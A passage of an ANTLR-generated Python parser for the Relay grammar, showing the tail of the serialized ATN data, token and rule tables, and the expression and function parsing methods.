buf.write("\u00a7\u00a8\5\f\7\2\u00a8\u00ab\7\4\2\2\u00a9\u00aa\7")
buf.write("\20\2\2\u00aa\u00ac\5\30\r\2\u00ab\u00a9\3\2\2\2\u00ab")
buf.write("\u00ac\3\2\2\2\u00ac\u00ad\3\2\2\2\u00ad\u00ae\5 \21\2")
buf.write("\u00ae\t\3\2\2\2\u00af\u00b0\7\21\2\2\u00b0\u00b2\5$\23")
buf.write("\2\u00b1\u00b3\5\26\f\2\u00b2\u00b1\3\2\2\2\u00b2\u00b3")
buf.write("\3\2\2\2\u00b3\u00b4\3\2\2\2\u00b4\u00b5\7\3\2\2\u00b5")
buf.write("\u00b6\5\f\7\2\u00b6\u00b9\7\4\2\2\u00b7\u00b8\7\20\2")
buf.write("\2\u00b8\u00ba\5\30\r\2\u00b9\u00b7\3\2\2\2\u00b9\u00ba")
buf.write("\3\2\2\2\u00ba\u00bb\3\2\2\2\u00bb\u00bc\5 \21\2\u00bc")
buf.write("\13\3\2\2\2\u00bd\u00c4\5\16\b\2\u00be\u00c4\5\22\n\2")
buf.write("\u00bf\u00c0\5\16\b\2\u00c0\u00c1\7\5\2\2\u00c1\u00c2")
buf.write("\5\22\n\2\u00c2\u00c4\3\2\2\2\u00c3\u00bd\3\2\2\2\u00c3")
buf.write("\u00be\3\2\2\2\u00c3\u00bf\3\2\2\2\u00c4\r\3\2\2\2\u00c5")
buf.write("\u00ca\5\20\t\2\u00c6\u00c7\7\5\2\2\u00c7\u00c9\5\20\t")
buf.write("\2\u00c8\u00c6\3\2\2\2\u00c9\u00cc\3\2\2\2\u00ca\u00c8")
buf.write("\3\2\2\2\u00ca\u00cb\3\2\2\2\u00cb\u00ce\3\2\2\2\u00cc")
buf.write("\u00ca\3\2\2\2\u00cd\u00c5\3\2\2\2\u00cd\u00ce\3\2\2\2")
buf.write("\u00ce\17\3\2\2\2\u00cf\u00d2\5$\23\2\u00d0\u00d1\7\22")
buf.write("\2\2\u00d1\u00d3\5\30\r\2\u00d2\u00d0\3\2\2\2\u00d2\u00d3")
buf.write("\3\2\2\2\u00d3\21\3\2\2\2\u00d4\u00d9\5\24\13\2\u00d5")
buf.write("\u00d6\7\5\2\2\u00d6\u00d8\5\24\13\2\u00d7\u00d5\3\2\2")
buf.write("\2\u00d8\u00db\3\2\2\2\u00d9\u00d7\3\2\2\2\u00d9\u00da")
buf.write("\3\2\2\2\u00da\u00dd\3\2\2\2\u00db\u00d9\3\2\2\2\u00dc")
buf.write("\u00d4\3\2\2\2\u00dc\u00dd\3\2\2\2\u00dd\23\3\2\2\2\u00de")
buf.write("\u00df\7*\2\2\u00df\u00e0\7\13\2\2\u00e0\u00e1\5\6\4\2")
buf.write("\u00e1\25\3\2\2\2\u00e2\u00e3\7\6\2\2\u00e3\u00f0\7\7")
buf.write("\2\2\u00e4\u00e5\7\6\2\2\u00e5\u00ea\5$\23\2\u00e6\u00e7")
buf.write("\7\5\2\2\u00e7\u00e9\5$\23\2\u00e8\u00e6\3\2\2\2\u00e9")
buf.write("\u00ec\3\2\2\2\u00ea\u00e8\3\2\2\2\u00ea\u00eb\3\2\2\2")
buf.write("\u00eb\u00ed\3\2\2\2\u00ec\u00ea\3\2\2\2\u00ed\u00ee\7")
buf.write("\7\2\2\u00ee\u00f0\3\2\2\2\u00ef\u00e2\3\2\2\2\u00ef\u00e4")
buf.write("\3\2\2\2\u00f0\27\3\2\2\2\u00f1\u00f2\7\3\2\2\u00f2\u011f")
buf.write("\7\4\2\2\u00f3\u00f4\7\3\2\2\u00f4\u00f5\5\30\r\2\u00f5")
buf.write("\u00f6\7\5\2\2\u00f6\u00f7\7\4\2\2\u00f7\u011f\3\2\2\2")
buf.write("\u00f8\u00f9\7\3\2\2\u00f9\u00fc\5\30\r\2\u00fa\u00fb")
buf.write("\7\5\2\2\u00fb\u00fd\5\30\r\2\u00fc\u00fa\3\2\2\2\u00fd")
buf.write("\u00fe\3\2\2\2\u00fe\u00fc\3\2\2\2\u00fe\u00ff\3\2\2\2")
buf.write("\u00ff\u0100\3\2\2\2\u0100\u0101\7\4\2\2\u0101\u011f\3")
buf.write("\2\2\2\u0102\u011f\5\36\20\2\u0103\u0104\7\23\2\2\u0104")
buf.write("\u0105\7\6\2\2\u0105\u0106\5\32\16\2\u0106\u0107\7\5\2")
buf.write("\2\u0107\u0108\5\30\r\2\u0108\u0109\7\7\2\2\u0109\u011f")
buf.write("\3\2\2\2\u010a\u010c\7\17\2\2\u010b\u010d\5\26\f\2\u010c")
buf.write("\u010b\3\2\2\2\u010c\u010d\3\2\2\2\u010d\u010e\3\2\2\2")
buf.write("\u010e\u0117\7\3\2\2\u010f\u0114\5\30\r\2\u0110\u0111")
buf.write("\7\5\2\2\u0111\u0113\5\30\r\2\u0112\u0110\3\2\2\2\u0113")
buf.write("\u0116\3\2\2\2\u0114\u0112\3\2\2\2\u0114\u0115\3\2\2\2")
buf.write("\u0115\u0118\3\2\2\2\u0116\u0114\3\2\2\2\u0117\u010f\3")
buf.write("\2\2\2\u0117\u0118\3\2\2\2\u0118\u0119\3\2\2\2\u0119\u011a")
buf.write("\7\4\2\2\u011a\u011b\7\20\2\2\u011b\u011f\5\30\r\2\u011c")
buf.write("\u011f\7\24\2\2\u011d\u011f\7)\2\2\u011e\u00f1\3\2\2\2")
buf.write("\u011e\u00f3\3\2\2\2\u011e\u00f8\3\2\2\2\u011e\u0102\3")
buf.write("\2\2\2\u011e\u0103\3\2\2\2\u011e\u010a\3\2\2\2\u011e\u011c")
buf.write("\3\2\2\2\u011e\u011d\3\2\2\2\u011f\31\3\2\2\2\u0120\u0121")
buf.write("\7\3\2\2\u0121\u0132\7\4\2\2\u0122\u0123\7\3\2\2\u0123")
buf.write("\u0124\5\34\17\2\u0124\u0125\7\5\2\2\u0125\u0126\7\4\2")
buf.write("\2\u0126\u0132\3\2\2\2\u0127\u0128\7\3\2\2\u0128\u012b")
buf.write("\5\34\17\2\u0129\u012a\7\5\2\2\u012a\u012c\5\34\17\2\u012b")
buf.write("\u0129\3\2\2\2\u012c\u012d\3\2\2\2\u012d\u012b\3\2\2\2")
buf.write("\u012d\u012e\3\2\2\2\u012e\u012f\3\2\2\2\u012f\u0130\7")
buf.write("\4\2\2\u0130\u0132\3\2\2\2\u0131\u0120\3\2\2\2\u0131\u0122")
buf.write("\3\2\2\2\u0131\u0127\3\2\2\2\u0132\33\3\2\2\2\u0133\u0134")
buf.write("\7\3\2\2\u0134\u0135\5\34\17\2\u0135\u0136\7\4\2\2\u0136")
buf.write("\u0139\3\2\2\2\u0137\u0139\7)\2\2\u0138\u0133\3\2\2\2")
buf.write("\u0138\u0137\3\2\2\2\u0139\35\3\2\2\2\u013a\u013b\7*\2")
buf.write("\2\u013b\37\3\2\2\2\u013c\u013d\7\r\2\2\u013d\u013e\5")
buf.write("\6\4\2\u013e\u013f\7\16\2\2\u013f!\3\2\2\2\u0140\u0144")
buf.write("\7(\2\2\u0141\u0144\7)\2\2\u0142\u0144\7\'\2\2\u0143\u0140")
buf.write("\3\2\2\2\u0143\u0141\3\2\2\2\u0143\u0142\3\2\2\2\u0144")
buf.write("#\3\2\2\2\u0145\u014a\5\2\2\2\u0146\u014a\7#\2\2\u0147")
buf.write("\u014a\7$\2\2\u0148\u014a\7%\2\2\u0149\u0145\3\2\2\2\u0149")
buf.write("\u0146\3\2\2\2\u0149\u0147\3\2\2\2\u0149\u0148\3\2\2\2")
buf.write("\u014a%\3\2\2\2$,\60ISVcm\177\u0097\u009a\u009d\u009f")
buf.write("\u00a4\u00ab\u00b2\u00b9\u00c3\u00ca\u00cd\u00d2\u00d9")
buf.write("\u00dc\u00ea\u00ef\u00fe\u010c\u0114\u0117\u011e\u012d")
buf.write("\u0131\u0138\u0143\u0149")
return buf.getvalue()
class RelayParser ( Parser ):
grammarFileName = "Relay.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
literalNames = [ "<INVALID>", "'('", "')'", "','", "'['", "']'", "'if'",
"'else'", "'let'", "'='", "';'", "'{'", "'}'", "'fn'",
"'->'", "'def'", "':'", "'Tensor'", "'_'", "'v0.0.3'",
"<INVALID>", "<INVALID>", "<INVALID>", "'*'", "'/'",
"'+'", "'-'", "'<'", "'>'", "'<='", "'>='", "'=='",
"'!='", "<INVALID>", "<INVALID>", "<INVALID>", "'mut'" ]
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "SEMVER", "WS",
"LINE_COMMENT", "COMMENT", "MUL", "DIV", "ADD", "SUB",
"LT", "GT", "LE", "GE", "EQ", "NE", "GLOBAL_VAR",
"LOCAL_VAR", "GRAPH_VAR", "MUT", "BOOL_LIT", "FLOAT",
"NAT", "CNAME" ]
RULE_opIdent = 0
RULE_prog = 1
RULE_expr = 2
RULE_func = 3
RULE_defn = 4
RULE_argList = 5
RULE_varList = 6
RULE_var = 7
RULE_attrList = 8
RULE_attr = 9
RULE_typeParamSeq = 10
RULE_type_ = 11
RULE_shapeSeq = 12
RULE_shape = 13
RULE_typeIdent = 14
RULE_body = 15
RULE_scalar = 16
RULE_ident = 17
ruleNames = [ "opIdent", "prog", "expr", "func", "defn", "argList",
"varList", "var", "attrList", "attr", "typeParamSeq",
"type_", "shapeSeq", "shape", "typeIdent", "body", "scalar",
"ident" ]
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
SEMVER=19
WS=20
LINE_COMMENT=21
COMMENT=22
MUL=23
DIV=24
ADD=25
SUB=26
LT=27
GT=28
LE=29
GE=30
EQ=31
NE=32
GLOBAL_VAR=33
LOCAL_VAR=34
GRAPH_VAR=35
MUT=36
BOOL_LIT=37
FLOAT=38
NAT=39
CNAME=40
def __init__(self, input:TokenStream, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7.1")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
class OpIdentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CNAME(self):
return self.getToken(RelayParser.CNAME, 0)
def getRuleIndex(self):
return RelayParser.RULE_opIdent
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitOpIdent" ):
return visitor.visitOpIdent(self)
else:
return visitor.visitChildren(self)
def opIdent(self):
localctx = RelayParser.OpIdentContext(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_opIdent)
try:
self.enterOuterAlt(localctx, 1)
self.state = 36
self.match(RelayParser.CNAME)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ProgContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def SEMVER(self):
return self.getToken(RelayParser.SEMVER, 0)
def EOF(self):
return self.getToken(RelayParser.EOF, 0)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def defn(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.DefnContext)
else:
return self.getTypedRuleContext(RelayParser.DefnContext,i)
def getRuleIndex(self):
return RelayParser.RULE_prog
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitProg" ):
return visitor.visitProg(self)
else:
return visitor.visitChildren(self)
def prog(self):
localctx = RelayParser.ProgContext(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_prog)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 38
self.match(RelayParser.SEMVER)
self.state = 46
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [RelayParser.EOF, RelayParser.T__14]:
self.state = 42
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__14:
self.state = 39
self.defn()
self.state = 44
self._errHandler.sync(self)
_la = self._input.LA(1)
pass
elif token in [RelayParser.T__0, RelayParser.T__3, RelayParser.T__5, RelayParser.T__7, RelayParser.T__12, RelayParser.SUB, RelayParser.GLOBAL_VAR, RelayParser.LOCAL_VAR, RelayParser.GRAPH_VAR, RelayParser.BOOL_LIT, RelayParser.FLOAT, RelayParser.NAT, RelayParser.CNAME]:
self.state = 45
self.expr(0)
pass
else:
raise NoViableAltException(self)
self.state = 48
self.match(RelayParser.EOF)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExprContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return RelayParser.RULE_expr
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class IdentExprContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def ident(self):
return self.getTypedRuleContext(RelayParser.IdentContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIdentExpr" ):
return visitor.visitIdentExpr(self)
else:
return visitor.visitChildren(self)
class CallContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitCall" ):
return visitor.visitCall(self)
else:
return visitor.visitChildren(self)
class NegContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitNeg" ):
return visitor.visitNeg(self)
else:
return visitor.visitChildren(self)
class TupleContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTuple" ):
return visitor.visitTuple(self)
else:
return visitor.visitChildren(self)
class ParensContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParens" ):
return visitor.visitParens(self)
else:
return visitor.visitChildren(self)
class FuncExprContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def func(self):
return self.getTypedRuleContext(RelayParser.FuncContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitFuncExpr" ):
return visitor.visitFuncExpr(self)
else:
return visitor.visitChildren(self)
class ScalarExprContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def scalar(self):
return self.getTypedRuleContext(RelayParser.ScalarContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitScalarExpr" ):
return visitor.visitScalarExpr(self)
else:
return visitor.visitChildren(self)
class LetContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def var(self):
return self.getTypedRuleContext(RelayParser.VarContext,0)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def MUT(self):
return self.getToken(RelayParser.MUT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLet" ):
return visitor.visitLet(self)
else:
return visitor.visitChildren(self)
class TensorContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTensor" ):
return visitor.visitTensor(self)
else:
return visitor.visitChildren(self)
class IfElseContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def body(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.BodyContext)
else:
return self.getTypedRuleContext(RelayParser.BodyContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIfElse" ):
return visitor.visitIfElse(self)
else:
return visitor.visitChildren(self)
class GraphContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def ident(self):
return self.getTypedRuleContext(RelayParser.IdentContext,0)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitGraph" ):
return visitor.visitGraph(self)
else:
return visitor.visitChildren(self)
class BinOpContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ExprContext
super().__init__(parser)
self.op = None # Token
self.copyFrom(ctx)
def expr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ExprContext)
else:
return self.getTypedRuleContext(RelayParser.ExprContext,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitBinOp" ):
return visitor.visitBinOp(self)
else:
return visitor.visitChildren(self)
def expr(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = RelayParser.ExprContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 4
self.enterRecursionRule(localctx, 4, self.RULE_expr, _p)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 125
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,7,self._ctx)
if la_ == 1:
localctx = RelayParser.ParensContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 51
self.match(RelayParser.T__0)
self.state = 52
self.expr(0)
self.state = 53
self.match(RelayParser.T__1)
pass
elif la_ == 2:
localctx = RelayParser.NegContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 55
self.match(RelayParser.SUB)
self.state = 56
self.expr(17)
pass
elif la_ == 3:
localctx = RelayParser.FuncExprContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 57
self.func()
pass
elif la_ == 4:
localctx = RelayParser.TupleContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 58
self.match(RelayParser.T__0)
self.state = 59
self.match(RelayParser.T__1)
pass
elif la_ == 5:
localctx = RelayParser.TupleContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 60
self.match(RelayParser.T__0)
self.state = 61
self.expr(0)
self.state = 62
self.match(RelayParser.T__2)
self.state = 63
self.match(RelayParser.T__1)
pass
elif la_ == 6:
localctx = RelayParser.TupleContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 65
self.match(RelayParser.T__0)
self.state = 66
self.expr(0)
self.state = 69
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 67
self.match(RelayParser.T__2)
self.state = 68
self.expr(0)
self.state = 71
self._errHandler.sync(self)
_la = self._input.LA(1)
if not (_la==RelayParser.T__2):
break
self.state = 73
self.match(RelayParser.T__1)
pass
elif la_ == 7:
localctx = RelayParser.TensorContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 75
self.match(RelayParser.T__3)
self.state = 84
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.T__0) | (1 << RelayParser.T__3) | (1 << RelayParser.T__5) | (1 << RelayParser.T__7) | (1 << RelayParser.T__12) | (1 << RelayParser.SUB) | (1 << RelayParser.GLOBAL_VAR) | (1 << RelayParser.LOCAL_VAR) | (1 << RelayParser.GRAPH_VAR) | (1 << RelayParser.BOOL_LIT) | (1 << RelayParser.FLOAT) | (1 << RelayParser.NAT) | (1 << RelayParser.CNAME))) != 0):
self.state = 76
self.expr(0)
self.state = 81
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 77
self.match(RelayParser.T__2)
self.state = 78
self.expr(0)
self.state = 83
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 86
self.match(RelayParser.T__4)
pass
elif la_ == 8:
localctx = RelayParser.IfElseContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 87
self.match(RelayParser.T__5)
self.state = 88
self.match(RelayParser.T__0)
self.state = 89
self.expr(0)
self.state = 90
self.match(RelayParser.T__1)
self.state = 91
self.body()
self.state = 92
self.match(RelayParser.T__6)
self.state = 93
self.body()
pass
elif la_ == 9:
localctx = RelayParser.LetContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 95
self.match(RelayParser.T__7)
self.state = 97
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.MUT:
self.state = 96
self.match(RelayParser.MUT)
self.state = 99
self.var()
self.state = 100
self.match(RelayParser.T__8)
self.state = 101
self.expr(0)
self.state = 102
self.match(RelayParser.T__9)
self.state = 103
self.expr(6)
pass
elif la_ == 10:
localctx = RelayParser.LetContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 105
self.match(RelayParser.T__7)
self.state = 107
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.MUT:
self.state = 106
self.match(RelayParser.MUT)
self.state = 109
self.var()
self.state = 110
self.match(RelayParser.T__8)
self.state = 111
self.match(RelayParser.T__10)
self.state = 112
self.expr(0)
self.state = 113
self.match(RelayParser.T__11)
self.state = 114
self.match(RelayParser.T__9)
self.state = 115
self.expr(5)
pass
elif la_ == 11:
localctx = RelayParser.GraphContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 117
self.ident()
self.state = 118
self.match(RelayParser.T__8)
self.state = 119
self.expr(0)
self.state = 120
self.match(RelayParser.T__9)
self.state = 121
self.expr(3)
pass
elif la_ == 12:
localctx = RelayParser.IdentExprContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 123
self.ident()
pass
elif la_ == 13:
localctx = RelayParser.ScalarExprContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 124
self.scalar()
pass
self._ctx.stop = self._input.LT(-1)
self.state = 157
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 155
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,10,self._ctx)
if la_ == 1:
localctx = RelayParser.BinOpContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 127
if not self.precpred(self._ctx, 16):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 16)")
self.state = 128
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not(_la==RelayParser.MUL or _la==RelayParser.DIV):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 129
self.expr(17)
pass
elif la_ == 2:
localctx = RelayParser.BinOpContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 130
if not self.precpred(self._ctx, 15):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 15)")
self.state = 131
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not(_la==RelayParser.ADD or _la==RelayParser.SUB):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 132
self.expr(16)
pass
elif la_ == 3:
localctx = RelayParser.BinOpContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 133
if not self.precpred(self._ctx, 14):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 14)")
self.state = 134
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.LT) | (1 << RelayParser.GT) | (1 << RelayParser.LE) | (1 << RelayParser.GE))) != 0)):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 135
self.expr(15)
pass
elif la_ == 4:
localctx = RelayParser.BinOpContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 136
if not self.precpred(self._ctx, 13):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 13)")
self.state = 137
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not(_la==RelayParser.EQ or _la==RelayParser.NE):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 138
self.expr(14)
pass
elif la_ == 5:
localctx = RelayParser.LetContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 139
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 140
self.match(RelayParser.T__9)
self.state = 141
self.expr(5)
pass
elif la_ == 6:
localctx = RelayParser.CallContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 142
if not self.precpred(self._ctx, 18):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 18)")
self.state = 143
self.match(RelayParser.T__0)
self.state = 152
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.T__0) | (1 << RelayParser.T__3) | (1 << RelayParser.T__5) | (1 << RelayParser.T__7) | (1 << RelayParser.T__12) | (1 << RelayParser.SUB) | (1 << RelayParser.GLOBAL_VAR) | (1 << RelayParser.LOCAL_VAR) | (1 << RelayParser.GRAPH_VAR) | (1 << RelayParser.BOOL_LIT) | (1 << RelayParser.FLOAT) | (1 << RelayParser.NAT) | (1 << RelayParser.CNAME))) != 0):
self.state = 144
self.expr(0)
self.state = 149
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 145
self.match(RelayParser.T__2)
self.state = 146
self.expr(0)
self.state = 151
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 154
self.match(RelayParser.T__1)
pass
self.state = 159
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class FuncContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def argList(self):
return self.getTypedRuleContext(RelayParser.ArgListContext,0)
def body(self):
return self.getTypedRuleContext(RelayParser.BodyContext,0)
def typeParamSeq(self):
return self.getTypedRuleContext(RelayParser.TypeParamSeqContext,0)
def type_(self):
return self.getTypedRuleContext(RelayParser.Type_Context,0)
def getRuleIndex(self):
return RelayParser.RULE_func
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitFunc" ):
return visitor.visitFunc(self)
else:
return visitor.visitChildren(self)
def func(self):
localctx = RelayParser.FuncContext(self, self._ctx, self.state)
self.enterRule(localctx, 6, self.RULE_func)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 160
self.match(RelayParser.T__12)
self.state = 162
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__3:
self.state = 161
self.typeParamSeq()
self.state = 164
self.match(RelayParser.T__0)
self.state = 165
self.argList()
self.state = 166
self.match(RelayParser.T__1)
self.state = 169
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__13:
self.state = 167
self.match(RelayParser.T__13)
self.state = 168
self.type_()
self.state = 171
self.body()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DefnContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
